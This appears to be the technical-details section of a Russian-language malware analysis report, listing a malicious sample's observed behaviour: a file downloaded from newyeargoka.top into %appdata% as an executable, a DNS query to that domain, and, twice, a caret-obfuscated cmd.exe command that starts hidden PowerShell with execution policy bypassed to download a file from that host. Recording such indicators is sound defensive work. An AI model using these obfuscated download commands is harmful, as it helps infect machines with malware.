Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OW^ERShelL.ex^e ^-EXeC^U^TI^onpOl^Ic^y ^By^PASs ^-n^oP^ROf^ile ^-windo^WsTy^L^E ^hIddE^n (neW-^O^bjEcT^ SyS^te^m.neT.^weBCL^i^eNT)^.^d^o^wnL^OadfiL^e('http://newyeargoka.top...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "P^OW^ERShelL.ex^e ^-EXeC^U^TI^onpOl^Ic^y ^By^PASs ^-n^oP^ROf^ile ^-windo^WsTy^L^E ^hIddE^n (neW-^O^bjEcT^ SyS^te^m.neT.^weBCL^i^eNT)^.^d^o^wnL^OadfiL^e('http://newyeargoka.top...' (со скрытым окном)